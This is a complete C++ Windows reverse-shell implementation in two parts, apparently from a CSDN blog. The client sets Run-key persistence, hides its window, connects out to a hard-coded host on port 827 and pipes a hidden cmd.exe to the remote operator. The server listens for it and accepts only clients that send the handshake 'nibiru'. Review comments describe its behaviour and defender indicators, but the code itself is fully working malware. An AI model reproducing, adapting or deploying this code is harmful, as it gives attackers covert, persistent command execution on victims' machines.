C++ 远程 shell (cmd)


Client:

#include <stdio.h>
#include <Windows.h>
#define SEND_BUFF_SIZE 2048
/*  interfAcer  */
/* (author) welcome to my csdn blog  http://blog.csdn.net/nibiru_holmes */
// (author) implements stripping the command string from the execution output
/*
 * NOTE(review): defensive annotation of a Windows reverse-shell sample.
 * The listing was extracted as a single line; line breaks were reconstructed
 * and the split after every `//` comment is presumed, so comment/code
 * boundaries are best-effort. No code token was changed.
 *
 * What the file does, as visible below (the points a defender keys on):
 *  - Reg(): writes the executable's own path under
 *    HKLM\Software\Microsoft\Windows\CurrentVersion\Run, value name
 *    "Nibiru Holmes" (logon persistence; the write asks for KEY_ALL_ACCESS
 *    on an HKLM key, which is normally only granted to administrators, and
 *    the result is never checked).
 *  - Connect(): outbound TCP to a hard-coded address on port 827, sends the
 *    6-byte handshake "nibiru", then starts cmd.exe from the system
 *    directory hidden (SW_HIDE) with stdin/stdout/stderr redirected through
 *    anonymous pipes and relays them to the socket.
 *  - main(): Reg() once, then Connect() in an endless loop with no delay.
 *  - The linker pragma builds a GUI-subsystem binary, so no console window
 *    is shown while it runs.
 */
using namespace std;
#pragma comment (lib,"ws2_32")
#pragma comment (lib,"User32.lib")
#pragma comment( linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"" )
// Socket to the operator side; set in Connect() and used by its relay loop.
SOCKET s;

// Persistence. Stores this module's path as REG_SZ value "Nibiru Holmes" in
// the machine-wide Run key. None of the three registry calls is checked; on
// an unprivileged account the HKLM write is expected to fail silently.
// Defender note: a Run value pointing at a user-writable path is the
// indicator here, and least privilege prevents the write altogether.
void Reg() {
    TCHAR pFileName[MAX_PATH] = "HGH";   // placeholder, overwritten by GetModuleFileName
    HKEY hWrite;
    DWORD dw = GetModuleFileName(NULL, pFileName, MAX_PATH);   // dw is then reused as the disposition out-param
    RegCreateKeyEx(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, NULL,REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS | KEY_WOW64_64KEY, NULL, &hWrite, &dw);
    RegOpenKeyEx(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_ALL_ACCESS | KEY_WOW64_64KEY, &hWrite);   // reopens the key just created; hWrite is overwritten
    RegSetValueEx(hWrite, "Nibiru Holmes", 0, REG_SZ, (const PBYTE)pFileName, (strlen(pFileName) + 1) * sizeof(TCHAR));
}

// Skips past the first '\n' in cmdstr and prints the remainder. Not called
// anywhere in this listing. The scan has no bound (it relies on a '\n' being
// present), and the remainder is passed to printf as the format string
// rather than as an argument, so any '%' in the data is interpreted.
void print(char *cmdstr){
    while (*((char*)cmdstr++) != '\n');
    printf(cmdstr);
}

/* Earlier version, kept by the author (commented out):
int Connect() {
    int length = 0;
    int flag = 0;
    WSADATA wsData;
    WSAStartup(MAKEWORD(2, 2), &wsData);
    s = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
    sockaddr_in sockaddr;
    sockaddr.sin_family = PF_INET;
    sockaddr.sin_addr.S_un.S_addr = inet_addr("127.0.0.1");
    sockaddr.sin_port = htons(1000);
    if (!connect(s, (SOCKADDR*)&sockaddr, sizeof(SOCKADDR))) {
        flag = 1;
        printf("connected");
    }
    //if (send(s, check, strlen(check) + sizeof(char), NULL)) { flag = 1; }
    return flag;
}
*/

// Opens the outbound connection, spawns the hidden cmd.exe and runs the
// relay loop until the operator side disconnects.
// Returns 0 when the connect fails or the peer goes away, -1 when pipe or
// process creation or the write to cmd.exe's stdin fails. main() loops on it.
// `length` and `flag` are assigned but never read.
int Connect(){
    int length = 0;
    int flag = 0;
    WSADATA wsData;
    WSAStartup(MAKEWORD(2, 2), &wsData);   // repeated on every reconnect; no matching WSACleanup in this file
    s = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
    char check[7] = {"nibiru"};   // 6-byte handshake the server compares against
    sockaddr_in sockaddr;
    sockaddr.sin_family = PF_INET;
    sockaddr.sin_addr.S_un.S_addr = inet_addr("127.0.0.1");    // author's alternative addresses left in the source:   115.28.79.163  192.168.1.148
    sockaddr.sin_port = htons(827);                              // alternative port left in the source: 43305
    if (!connect(s, (SOCKADDR*)&sockaddr, sizeof(SOCKADDR))) {
        flag = 1;
        printf("connected");   // never visible: the binary has no console (see linker pragma)
        send(s, check,6, NULL);   // handshake, without the terminating NUL
    }
    else return 0;
    HANDLE hReadPipe1, hWritePipe1, hReadPipe2, hWritePipe2; // four HANDLEs used to create two pipes
    CHAR Buff[SEND_BUFF_SIZE] = { 0 };
    CHAR sendBuff[SEND_BUFF_SIZE] = ("dir \n");   // initial content is never used: zeroed before the first recv
    SECURITY_ATTRIBUTES sa;
    sa.nLength = sizeof(sa);
    sa.lpSecurityDescriptor = 0;
    sa.bInheritHandle = true;   // pipe ends must be inheritable for the child cmd.exe
    int ret;   // receives API results that are never examined
    if (!CreatePipe(&hReadPipe1, &hWritePipe1, &sa, 0))// create two anonymous pipes
    {return -1;}
    if (!CreatePipe(&hReadPipe2, &hWritePipe2, &sa, 0)){return -1;}
    // startup info
    STARTUPINFO si;
    ZeroMemory(&si, sizeof(si));
    //GetStartupInfo(&si);
    si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
    si.wShowWindow = SW_HIDE;   // child console window hidden
    si.hStdInput = hReadPipe2;
    si.hStdOutput = si.hStdError = hWritePipe1;      //  pipe 2 = input, pipe 1 = output
    char cmdLine[256] = { 0 };
    GetSystemDirectory(cmdLine, sizeof(cmdLine));
    strcat(cmdLine, ("\\cmd.exe"));   // "<system dir>\cmd.exe"
    PROCESS_INFORMATION ProcessInformation;
    // bInheritHandles = TRUE so the child sees the pipe ends. Defender note:
    // a process with an established outbound connection starting cmd.exe
    // with redirected standard handles is the observable pattern here.
    if (CreateProcess(cmdLine, NULL, NULL, NULL, TRUE, 0, NULL, NULL, &si, &ProcessInformation) == 0){return -1;}
    unsigned long lBytesRead, lBytesWrite;// variables holding the read/write counts
    //WriteFile(hWritePipe2, "\r\n", 2, &lBytesWrite, 0);
    // Relay loop, one command per iteration: read cmd.exe output and send it,
    // nudge cmd.exe with "\r\n" and read again (that second read is
    // discarded), then block in recv for the next command and write it to
    // cmd.exe's stdin. The commented-out if/else is the abandoned
    // PeekNamedPipe-driven design.
    while (TRUE) {
        lBytesRead = 0;
        ZeroMemory(Buff, sizeof(Buff));
        ret = PeekNamedPipe(hReadPipe1, Buff, SEND_BUFF_SIZE, &lBytesRead, 0, 0);   // result and count unused
        //if (lBytesRead)
        //{
        memset(Buff, 0, sizeof(Buff));
        ret = ReadFile(hReadPipe1, Buff, SEND_BUFF_SIZE, &lBytesRead, 0);
        //printf(Buff);
        send(s, Buff, strlen(Buff)+ sizeof(char), NULL);   // up to the first NUL, plus the NUL
        //}
        //else {
        WriteFile(hWritePipe2, "\r\n", 2, &lBytesWrite, 0);
        //Sleep(100);
        ret = ReadFile(hReadPipe1, Buff, SEND_BUFF_SIZE, &lBytesWrite, 0);// read the data in the pipe (overwritten and never sent)
        // read the input data, terminated by a newline
        char ch;   // unused
        ZeroMemory(sendBuff, sizeof(sendBuff));
        int count = 0;   // unused
        int check = 0;   // shadows the handshake array above; holds the recv result
        check=recv(s, sendBuff, MAXBYTE, 0);   // at most MAXBYTE (255) bytes of command per iteration
        if (check <= 0) {
            //PostThreadMessage(ProcessInformation.dwThreadId, WM_QUIT, 0, 0);
            TerminateProcess(ProcessInformation.hProcess,0);   // peer gone or error: kill cmd.exe, return to main()'s reconnect loop
            //PostMessage(ProcessInformation.hProcess, WM_CLOSE, 0, 0);
            break; }
        // Writes the whole 2048-byte buffer (trailing zero bytes included) to cmd.exe's stdin.
        if (!WriteFile(hWritePipe2, sendBuff, sizeof(sendBuff), &lBytesWrite, 0)){TerminateProcess(ProcessInformation.hProcess, 0);return -1;}
        Sleep(100);
        //}
    }
    return 0;
}

// Entry point: install persistence once, then reconnect forever. There is
// no delay between attempts, so a fast connect failure loops immediately.
int main() {
    Reg();
    while (TRUE) {Connect();}
    return 0;
}



Server:

#include<iostream>
#include<winsock2.h>
#pragma comment (lib,"ws2_32")
/*  interfAcer  */
/* (author) welcome to my csdn blog  http://blog.csdn.net/nibiru_holmes */
#pragma comment (lib,"USer32")
/*
 * NOTE(review): defensive annotation of the operator-side listener for the
 * client above. The listing was extracted as a single line; line breaks were
 * reconstructed and the split after every `//` comment is presumed. No code
 * token was changed.
 *
 * Visible behaviour: binds 0.0.0.0:827, accepts connections until one sends
 * the 6-byte handshake "nibiru" (others are only logged as KILL; their
 * sockets are neither closed nor reused), then runs an interactive loop that
 * prints whatever the peer sends and forwards lines typed on stdin to it.
 * funproc() is a per-client thread variant that is never started (the
 * CreateThread call in main() is commented out).
 */
using namespace std;

/* Earlier version, kept by the author (commented out):
int Connect() {
    char Recv[MAXBYTE] = { NULL };
    char Send[MAXBYTE] = { NULL };
    WSADATA wsaData;
    WSAStartup(MAKEWORD(2, 2), &wsaData);                        // socket s is used for listening
    sockaddr_in sockaddr;
    sockaddr.sin_family = PF_INET;
    sockaddr.sin_addr.S_un.S_addr = inet_addr("127.0.0.1");
    sockaddr.sin_port = htons(1000);
    bind(s, (SOCKADDR*)&sockaddr, sizeof(sockaddr));
    SOCKADDR clientAddr = { 0 };
    int nSize = sizeof(SOCKADDR);
    SOCKET clientSock;
    listen(s, 1);                                                                      // start listening
    clientSock = accept(s, (SOCKADDR*)&clientAddr, &nSize);
    if (clientSock) {
        recv(s, Recv, MAXBYTE, 0);
        cout << Recv << endl;
        while (TRUE) {
            cout << "[*] ";
            gets_s(Send, MAXBYTE);
            send(clientSock, Send, sizeof(Send), NULL);
            recv(s, Recv, MAXBYTE, 0);
            cout << Recv << endl;
        }
    }
    return 1;
}
*/

// Per-connection worker meant for CreateThread; lpData points at the
// accepted SOCKET. Not started anywhere in this listing. The body repeats
// main()'s interactive loop but in send-then-receive order, and never
// returns (infinite loop, no return statement).
DWORD WINAPI funproc(LPVOID lpData)   {
    AllocConsole();
    SOCKET  clientSock = *(SOCKET *)lpData;
    char Recv[2048] = { NULL };
    char Send[MAXBYTE] = { NULL };
    struct sockaddr_in sa;
    int len = sizeof(sa);
    STARTUPINFO si;
    ZeroMemory(&si, sizeof(si));
    si.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
    si.wShowWindow = SW_SHOW;
    //si.hStdInput = hReadPipe2;
    //si.hStdOutput = si.hStdError = hWritePipe1;
    char cmdLine[] = "cmd.exe";   // si, cmdLine and pi are leftovers: the CreateProcess below is commented out
    PROCESS_INFORMATION pi;
    ZeroMemory(&si, sizeof(si));   // wipes the flags set a few lines above
    //CreateProcess(NULL, cmdLine, NULL, NULL, 1, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi);
    getpeername(clientSock, (struct sockaddr *)&sa, &len);      // get the socket's peer IP and port
    //AllocConsole();
    //ShellExecute(NULL, "open", "cmd.exe", "命令行", NULL, SW_SHOW);
    printf("new Thread");
    printf(" Thread 接受到一个连接:%s:%d\r\n", inet_ntoa(sa.sin_addr), ntohs(sa.sin_port));
    //system("pause");
    while (TRUE) {
        char ch;
        int count = 0;
        //cout << "[*] ";
        memset(Send, 0, MAXBYTE);
        //gets_s(Send, MAXBYTE);                           // single-pipe: use gets_s; dual-pipe: use getchar() and replace '\n' with '\r\n'
        // Reads one stdin line into Send with no bound on count (Send holds MAXBYTE bytes).
        while ((ch = getchar()) != '\n'){Send[count] = ch;count++;}
        strcat(Send, "\r\n");
        send(clientSock, Send, sizeof(Send), NULL);   // sends the whole MAXBYTE buffer, not just the line
        ZeroMemory(Recv, 2048);
        recv(clientSock, Recv, 2048, 0);   // single recv, result unchecked; a full 2048-byte read leaves Recv unterminated for the cout below
        cout << Recv;
        //printf("recv %d",length);
    }
}

// Operator console. Listens on all interfaces, port 827, accepts until a
// client presents the handshake "nibiru", then loops: receive and print,
// read a line from stdin, send it. `three`, `undernum`, `length`, `sa2`,
// `len2`, `local` and `Saddr` are unused or leftovers of the threaded
// design. Returns 0 only if the interactive loop is ever left, which the
// code as written does not do.
int main() {
    HANDLE three[255];   // threads
    int undernum = 0;  // index
    int length = 0;
    char Recv[2048] = { NULL };
    char Send[MAXBYTE] = { NULL };
    struct sockaddr_in sa2;
    int len2 = sizeof(sa2);
    WSADATA wsaData;
    WSAStartup(MAKEWORD(2, 2), &wsaData);
    // socket s is used for listening
    SOCKET s = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
    sockaddr_in sockaddr;
    sockaddr.sin_family = PF_INET;
    sockaddr.sin_addr.S_un.S_addr = inet_addr("0.0.0.0");   // all interfaces
    sockaddr.sin_port = htons(827);
    SOCKADDR Saddr;
    int len = 0;
    char local[] = {"127.0.0.1"};
    char check[7] = { "nibiru" };   // expected handshake
    char check2[7] = { "" };        // receives the first 6 bytes from each connection
    bind(s, (SOCKADDR*)&sockaddr, sizeof(sockaddr));   // result unchecked
    sockaddr_in clientAddr = { 0 };
    int nSize = sizeof(SOCKADDR);
    SOCKET clientSock=0;//[255];
    listen(s, 1);     // start listening
    // Accept loop: leaves on the first connection whose opening bytes match
    // the handshake. A non-matching connection is logged and abandoned
    // (its socket is overwritten on the next accept, never closed).
    while (TRUE) {
        clientSock = accept(s, (SOCKADDR*)&clientAddr, &nSize);
        Sleep(100);
        recv(clientSock, check2, 6, 0);   // count unchecked; check2[6] stays NUL from the initialiser
        if (!strcmp(check,check2)) {
            //cout << "right" << endl;
            break;
        }
        else printf(" KILL 接受到一个连接 From:%s:%d \r\n", inet_ntoa(clientAddr.sin_addr), ntohs(clientAddr.sin_port));
    }
    if (clientSock) {
        getsockname(clientSock,&Saddr,&len);   // len is 0 here, so this call cannot fill Saddr; Saddr is unused anyway
        printf(" 接受到一个连接 From:%s:%d \r\n", inet_ntoa(clientAddr.sin_addr), ntohs(clientAddr.sin_port));
        //printf(" To:%s:%d \r\n", inet_ntoa(Saddr.), ntohs(clientAddr.sin_port));
        closesocket(s);   // listening socket closed: only this one client is served
        //recv(clientSock, Recv, 1024, 0);
        //cout << Recv << endl;
        while (TRUE) {
            char ch;
            int count = 0;
            //cout << "[*] ";
            ZeroMemory(Recv, 2048);
            recv(clientSock, Recv, 2048, 0);   // single recv, result unchecked (peer closing is not detected here)
            cout << Recv;
            //printf("recv 
            memset(Send, 0, MAXBYTE);
            //gets_s(Send, MAXBYTE);                           // single-pipe: use gets_s; dual-pipe: use getchar() and replace '\n' with '\r\n'
            // Reads one stdin line into Send with no bound on count (Send holds MAXBYTE bytes).
            while ((ch = getchar()) != '\n'){Send[count] = ch;count++;}
            strcat(Send, "\r\n");
            send(clientSock, Send, sizeof(Send), NULL);   // whole MAXBYTE buffer; the client reads at most MAXBYTE per command
            //%d",length);
        }
        //three[undernum] = CreateThread(NULL, 0, funproc, (LPVOID)&clientSock, 0, NULL);
        //undernum++;
        //getpeername(clientSock, (struct sockaddr *)&sa2, &len2);
        //printf(" 接受到一个连接222:%s:%d\r\n", inet_ntoa(sa2.sin_addr), ntohs(sa2.sin_port));
    }
    //Sleep(1000);
    //}
    // Leftover of the per-client array design: closes the same socket 255 times.
    for (int i = 0; i < 255; i++) {closesocket(clientSock);}
    WSACleanup();
    printf("out /r/n");   // literal "/r/n" as written by the author
    system("pause");
    return 0;
}


